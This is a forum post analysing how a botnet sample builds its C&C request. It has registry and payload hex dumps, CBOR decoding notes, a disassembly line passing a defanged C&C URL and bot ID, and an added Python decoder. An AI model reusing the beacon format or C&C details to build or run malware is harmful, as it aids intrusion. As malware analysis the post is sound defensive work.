This post was last edited by 楚轩 on 2015-9-12 15:30.
Heh.
Stage 3
In this stage the malware builds a payload that initiates the C&C request and sends it. The details of how the stage 3 payload is built, and of the malware's logic, are described below.
The malware computes some computer-specific data (as described in stage 2) and compares the result with the data stored under:
HKEY_CURRENT_USER\Software\Classes\CLSID\{[computer_unique_guid]}
If they are equal, the malware proceeds to the next stage.
The data stored in the registry under HKEY_CURRENT_USER\Software\Classes\CLSID\{[computer_unique_guid]} is listed below.
For example, on the test machine the value is 0x170 bytes long, and the encrypted data stored in the registry is:
00854B78  5F 1D B6 44 5B 87 A7 2E 74 81 51 7F 34 CA CC 9D
00854B88  FC 74 61 04 C2 61 9E 99 E5 A7 64 02 8E D2 79 05
00854B98  68 41 E1 33 96 C7 B7 EB 83 35 07 43 47 1A A8 74
00854BA8  F7 CC B0 27 73 7A 7E 63 60 D7 5B AB 43 1B 41 65
00854BB8  7F D1 A6 8B 85 B1 DE E4 B2 B5 A7 7E 74 B6 44 14
00854BC8  B5 B8 D3 56 D3 0A 72 CC 62 BF 64 F4 3F 4D F1 D8
00854BD8  84 2B 45 B8 DB BA 22 C2 B5 95 34 FA 69 85 A6 01
00854BE8  02 80 29 90 60 A9 11 13 C3 77 31 6E 06 23 BA 3A
00854BF8  64 D5 78 FA 2C E3 E5 3A 2B 18 4C 1F 74 31 B3 25
00854C08  BF 78 2C 45 4F 71 F6 F1 B4 5D 16 E3 CD 40 60 B8
00854C18  D9 7B CE AF 87 4F 88 75 FB CC DB 8F AA 33 CF 46
00854C28  3D 5D 7C 46 85 B5 92 33 B7 B8 E8 E9 5D 88 17 31
00854C38  46 76 F4 EA 05 D2 71 04 55 B0 BF B3 A1 E9 9C BF
00854C48  E7 E6 5A 51 C5 F1 4A DF CF 46 8B 4F 54 57 57 4F
00854C58  6E EF 29 C1 BC C0 32 14 B5 3D 84 4C 87 7A 73 BA
00854C68  40 B2 06 B7 42 85 7C 44 65 1E EE 69 2F 7E 37 B8
00854C78  E5 A6 CC 26 06 9D 32 B3 71 7E D0 13 45 CF 01 D9
00854C88  77 DA 8C 8E 90 3D 0E D1 F7 FE B1 24 99 20 89 C7
00854C98  41 1D DA 62 66 08 AF 48 C9 F8 5C F8 3D 83 7E 92
00854CA8  BF 8C 18 49 CA 81 CE 77 48 93 04 A3 B1 9D 07 60
00854CB8  5B CE A7 0D 23 09 B6 8D 7E 2E B9 B9 1A 73 3E 84
00854CC8  21 9C EF 83 41 66 72 E1 61 4A 4D 62 4E 0E FF FE
00854CD8  C9 F2 15 3B BC 38 11 A2 2B 0C 35 CF F4 EB 35 E5
The decrypted data is:
00854E90  00 00 00 00 67 01 00 00 A6 69 46 69 72 73 74 54  ....g....iFirstT
00854EA0  69 6D 65 01 6E 6D 6F 64 75 6C 65 73 46 65 74 63  ime.nmodulesFetc
00854EB0  68 65 64 00 66 48 61 73 68 50 45 50 8A 15 4F AE  hed.fHashPEP..O.
00854EC0  3B 78 B4 8D B1 71 C4 C9 49 99 E0 C0 6C 73 7A 42  ;x...q..I...lszB
00854ED0  6F 74 6E 65 74 4E 61 6D 65 67 42 4F 54 4E 45 54  otnetNamegBOTNET
00854EE0  32 6D 73 7A 49 6E 73 74 61 6C 6C 50 61 74 68 78  2mszInstallPathx
00854EF0  55 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E  UC:\Documents an
00854F00  64 20 53 65 74 74 69 6E 67 73 5C 69 5C 41 70 70  d Settings\i\App
00854F10  6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 4D 66  lication Data\Mf
00854F20  7A 78 41 48 43 62 5C 48 51 48 4B 57 62 73 76 5C  zxAHCb\HQHKWbsv\
00854F30  50 4D 71 4C 4D 4B 74 6A 5C 6F 50 51 56 4E 69 52  PMqLMKtj\oPQVNiR
00854F40  67 73 2E 65 78 65 6C 77 49 6E 73 74 61 6C 6C 50  gs.exelwInstallP
00854F50  61 74 68 58 AA 43 00 3A 00 5C 00 44 00 6F 00 63  athX.C.:.\.D.o.c
00854F60  00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61  .u.m.e.n.t.s. .a
00854F70  00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69  .n.d. .S.e.t.t.i
00854F80  00 6E 00 67 00 73 00 5C 00 69 00 5C 00 41 00 70  .n.g.s.\.i.\.A.p
00854F90  00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F  .p.l.i.c.a.t.i.o
00854FA0  00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 4D  .n. .D.a.t.a.\.M
00854FB0  00 66 00 7A 00 78 00 41 00 48 00 43 00 62 00 5C  .f.z.x.A.H.C.b.\
00854FC0  00 48 00 51 00 48 00 4B 00 57 00 62 00 73 00 76  .H.Q.H.K.W.b.s.v
00854FD0  00 5C 00 50 00 4D 00 71 00 4C 00 4D 00 4B 00 74  .\.P.M.q.L.M.K.t
00854FE0  00 6A 00 5C 00 6F 00 50 00 51 00 56 00 4E 00 69  .j.\.o.P.Q.V.N.i
00854FF0  00 52 00 67 00 73 00 2E 00 65 00 78 00 65 00 00  .R.g.s...e.x.e..
Layout: bytes 0-3 are zero, bytes 4-7 hold the length of the data (here 67 01 00 00, i.e. 0x167 little-endian), and the data itself starts at byte 8. The body is CBOR-encoded: 0xA6 opens a map of six key/value pairs; 0x69, 0x6E, 0x66, 0x6C and 0x6D are text-string headers of that many bytes for the keys FirstTime, modulesFetched, HashPE, szBotnetName, szInstallPath and wInstallPath; 0x50 introduces the 16-byte PE hash, 0x78 0x55 the 85-byte ANSI install path and 0x58 0xAA the same path as a 170-byte UTF-16 byte string.
Next, the data is tokenized, i.e. unpacked from this serialized form into a fixed-layout structure in memory:
00854D08  01 00 00 00 00 00 00 00 8A 15 4F AE 3B 78 B4 8D  ..........O.;x..
00854D18  B1 71 C4 C9 49 99 E0 C0 42 4F 54 4E 45 54 32 00  .q..I...BOTNET2.
...
00854E18  00 00 00 00 00 00 00 00 00 00 00 00 00 43 3A 5C  .............C:\
00854E28  44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65  Documents and Se
00854E38  74 74 69 6E 67 73 5C 69 5C 41 70 70 6C 69 63 61  ttings\i\Applica
00854E48  74 69 6F 6E 20 44 61 74 61 5C 4D 66 7A 78 41 48  tion Data\MfzxAH
00854E58  43 62 5C 48 51 48 4B 57 62 73 76 5C 50 4D 71 4C  Cb\HQHKWbsv\PMqL
00854E68  4D 4B 74 6A 5C 6F 50 51 56 4E 69 52 67 73 2E 65  MKtj\oPQVNiRgs.e
00854E78  78 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00  xe..............
...
00854F28  00 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00  ..C.:.\.D.o.c.u.
00854F38  6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00  m.e.n.t.s. .a.n.
00854F48  64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00  d. .S.e.t.t.i.n.
00854F58  67 00 73 00 5C 00 69 00 5C 00 41 00 70 00 70 00  g.s.\.i.\.A.p.p.
00854F68  6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00  l.i.c.a.t.i.o.n.
00854F78  20 00 44 00 61 00 74 00 61 00 5C 00 4D 00 66 00   .D.a.t.a.\.M.f.
00854F88  7A 00 78 00 41 00 48 00 43 00 62 00 5C 00 48 00  z.x.A.H.C.b.\.H.
00854F98  51 00 48 00 4B 00 57 00 62 00 73 00 76 00 5C 00  Q.H.K.W.b.s.v.\.
00854FA8  50 00 4D 00 71 00 4C 00 4D 00 4B 00 74 00 6A 00  P.M.q.L.M.K.t.j.
00854FB8  5C 00 6F 00 50 00 51 00 56 00 4E 00 69 00 52 00  \.o.P.Q.V.N.i.R.
00854FC8  67 00 73 00 2E 00 65 00 78 00 65 00 00 00 00 00  g.s...e.x.e.....
FirstTime (1) and modulesFetched (0) are the two leading DWORDs, the 16-byte hash follows at +0x08, and each string sits in its own fixed-size buffer: BOTNET2 at +0x18, the ANSI path at +0x11D and the UTF-16 path at +0x222 (the buffers are 0x105 bytes apart, i.e. MAX_PATH + 1).
The same operations are applied to the data stored under HKEY_CURRENT_USER\Software\Classes\CLSID\{[computer_unique_guid]}\1.
The domain name and the commonly used request page are kept in an interesting structure, stored locally in an array-like structure:
00855EF8  90 67 85 00 D0 67 85 00 10 68 85 00 48 68 85 00  .g...g...h..Hh..
00855F08  2F 6E 65 74 72 65 70 6F 72 74 2E 70 68 70 00 00  /netreport.php..
(four little-endian pointers, 0x00856790, 0x008567D0, 0x00856810 and 0x00856848, followed by the string "/netreport.php")
Then the following interesting function is called:
.text:0040FB1B 50              push    eax             ; void *
.text:0040FB1C 51              push    ecx             ; int ; db 'I-C957A26036A04#972958A65880B55A0EBD5559078C1735',0
                                                       ; this is computer_name#md5hash as described in dump.txt
.text:0040FB1D 57              push    edi             ; int ; 'hxxp://soft.kcssoft.biz/netreport.php',0
.text:0040FB1E E8 FD FE FF FF  call    c2
The first thing the malware does in this function is build the payload for the request to the C&C server.
For example, on the test machine the first part of the plaintext payload (0x123 bytes long) is:
00856A90  82 A7 69 6C 70 73 7A 42 6F 74 49 44 78 30 49 2D  ..ilpszBotIDx0I-
00856AA0  43 39 35 37 41 32 36 30 33 36 41 30 34 23 39 37  C957A26036A04#97
00856AB0  32 39 35 38 41 36 35 38 38 30 42 35 35 41 30 45  2958A65880B55A0E
00856AC0  42 44 35 35 35 39 30 37 38 43 31 37 33 35 6B 6C  BD5559078C1735kl
00856AD0  70 73 7A 56 65 72 73 69 6F 6E 67 32 2E 30 2E 30  pszVersiong2.0.0
00856AE0  2E 30 68 6D 61 69 6E 54 79 70 65 00 67 73 75 62  .0hmainType.gsub
00856AF0  54 79 70 65 00 67 42 69 74 6E 65 73 73 18 20 6B  Type.gBitness. k
00856B00  64 77 54 69 6D 65 73 74 61 6D 70 00 64 44 61 74  dwTimestamp.dDat
00856B10  61 A2 66 4C 65 6E 67 74 68 00 66 6C 70 44 61 74  a.fLength.flpDat
00856B20  61 40 A7 69 6C 70 73 7A 42 6F 74 49 44 78 30 49  a@.ilpszBotIDx0I
00856B30  2D 43 39 35 37 41 32 36 30 33 36 41 30 34 23 39  -C957A26036A04#9
00856B40  37 32 39 35 38 41 36 35 38 38 30 42 35 35 41 30  72958A65880B55A0
00856B50  45 42 44 35 35 35 39 30 37 38 43 31 37 33 35 6B  EBD5559078C1735k
00856B60  6C 70 73 7A 56 65 72 73 69 6F 6E 67 32 2E 30 2E  lpszVersiong2.0.
00856B70  30 2E 30 68 6D 61 69 6E 54 79 70 65 00 67 73 75  0.0hmainType.gsu
00856B80  62 54 79 70 65 01 67 42 69 74 6E 65 73 73 18 20  bType.gBitness. 
00856B90  6B 64 77 54 69 6D 65 73 74 61 6D 70 00 64 44 61  kdwTimestamp.dDa
The payload uses the same CBOR encoding as the registry value: 0x82 opens an array of two items, each a map of seven pairs (0xA7) with the keys lpszBotID (the 48-byte text "I-C957A26036A04#972958A65880B55A0EBD5559078C1735", 0x78 0x30), lpszVersion ("2.0.0.0"), mainType (0), subType, Bitness (0x18 0x20 = 32), dwTimestamp (0) and Data (itself a map with Length = 0 and an empty lpData byte string, 0x40). As far as the dump shows, the second map differs from the first only in subType = 1.
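As an added example (not code from the original post or from the malware itself), the following Python decoder parses the two blobs above: the 0x170-byte decrypted registry value (header check, then the CBOR body) and the leading part of the C&C payload (the array header plus its first map, which is the part the dump shows completely). The hex constants are transcribed from the test-machine dumps in the post; the function names `_argument`, `cbor_decode`, `parse_registry_blob` and `decode_payload_head` and the little-endian reading of the length field are assumptions made here, and the reader is a minimal hand-written one that covers only the CBOR types these blobs contain, not a general library.

```python
# Added example, not code from the original post or from the malware itself.
# The byte layouts in the dumps match CBOR (RFC 7049): 0xA6 = map of 6 pairs,
# 0x69 = 9-byte text string, 0x78 nn / 0x58 nn = text / byte string with a
# one-byte length, 0x18 nn = one-byte unsigned int, 0x82 = array of 2 items.
# Minimal hand-written reader for exactly those types; the hex constants are
# transcribed from the test-machine dumps in the post. Function names and the
# little-endian length field are assumptions made for this example.
import struct

# Decrypted HKCU\Software\Classes\CLSID\{guid} value, 0x170 bytes (from the dump).
REG_BLOB = bytes.fromhex(
    "0000000067010000A669466972737454696D65016E6D6F64756C657346657463"
    "6865640066486173685045508A154FAE3B78B48DB171C4C94999E0C06C737A42"
    "6F746E65744E616D6567424F544E4554326D737A496E7374616C6C5061746878"
    "55433A5C446F63756D656E747320616E642053657474696E67735C695C417070"
    "6C69636174696F6E20446174615C4D667A78414843625C4851484B576273765C"
    "504D714C4D4B746A5C6F5051564E695267732E6578656C77496E7374616C6C50"
    "61746858AA43003A005C0044006F00630075006D0065006E0074007300200061"
    "006E0064002000530065007400740069006E00670073005C0069005C00410070"
    "0070006C00690063006100740069006F006E00200044006100740061005C004D"
    "0066007A00780041004800430062005C004800510048004B0057006200730076"
    "005C0050004D0071004C004D004B0074006A005C006F005000510056004E0069"
    "005200670073002E0065007800650000"
)

# First 146 bytes of the plaintext C&C payload: the array(2) header plus its
# first map, which is the part the dump shows completely.
PAYLOAD_HEAD = bytes.fromhex(
    "82A7696C70737A426F7449447830492D43393537413236303336413034233937"
    "3239353841363538383042353541304542443535353930373843313733356B6C"
    "70737A56657273696F6E67322E302E302E30686D61696E547970650067737562"
    "5479706500674269746E65737318206B647754696D657374616D700064446174"
    "61A2664C656E67746800666C704461746140"
)


def _argument(buf, pos, info):
    """Additional-info field of a CBOR head: < 24 is the value itself,
    24..27 means the value follows in 1/2/4/8 big-endian bytes."""
    if info < 24:
        return info, pos
    size = {24: 1, 25: 2, 26: 4, 27: 8}[info]
    return int.from_bytes(buf[pos:pos + size], "big"), pos + size


def cbor_decode(buf, pos=0):
    """Decode one CBOR item at buf[pos]; return (value, position after it).
    Covers unsigned ints, byte strings, text strings, arrays and maps only."""
    major, info = buf[pos] >> 5, buf[pos] & 0x1F
    n, pos = _argument(buf, pos + 1, info)
    if major == 0:                       # unsigned integer
        return n, pos
    if major == 2:                       # byte string of n bytes
        return bytes(buf[pos:pos + n]), pos + n
    if major == 3:                       # UTF-8 text string of n bytes
        return buf[pos:pos + n].decode("utf-8"), pos + n
    if major == 4:                       # array of n items
        items = []
        for _ in range(n):
            item, pos = cbor_decode(buf, pos)
            items.append(item)
        return items, pos
    if major == 5:                       # map of n key/value pairs
        out = {}
        for _ in range(n):
            key, pos = cbor_decode(buf, pos)
            out[key], pos = cbor_decode(buf, pos)
        return out, pos
    raise ValueError("unsupported CBOR major type %d" % major)


def parse_registry_blob(blob):
    """Registry value layout from the post: bytes 0-3 zero, bytes 4-7 the body
    length (read as little-endian here), body from byte 8. Returns the map."""
    zero, length = struct.unpack_from("<II", blob, 0)
    if zero != 0 or 8 + length > len(blob):
        raise ValueError("bad header or length field")
    body = blob[8:8 + length]
    value, end = cbor_decode(body)
    if end != length:
        raise ValueError("CBOR item does not fill the declared length")
    return value


def decode_payload_head(buf):
    """The payload is a CBOR array of two maps; decode only the first map,
    which is what the dump shows completely. Returns (map, end offset)."""
    if buf[0] != 0x82:
        raise ValueError("expected CBOR array(2) header")
    return cbor_decode(buf, 1)


if __name__ == "__main__":
    cfg = parse_registry_blob(REG_BLOB)
    for key, val in cfg.items():
        print("%-14s %r" % (key, val.decode("utf-16-le") if key == "wInstallPath" else val))
    bot, end = decode_payload_head(PAYLOAD_HEAD)
    print("payload[1:%d]:" % end, bot)
```

Running it prints the six registry fields (with the UTF-16 path decoded, which matches the ANSI path byte for byte) and the first payload map with Bitness = 32 and an empty Data member. The reader deliberately rejects the CBOR major types the blobs never use, so a sample whose encoding has drifted fails loudly instead of being misread.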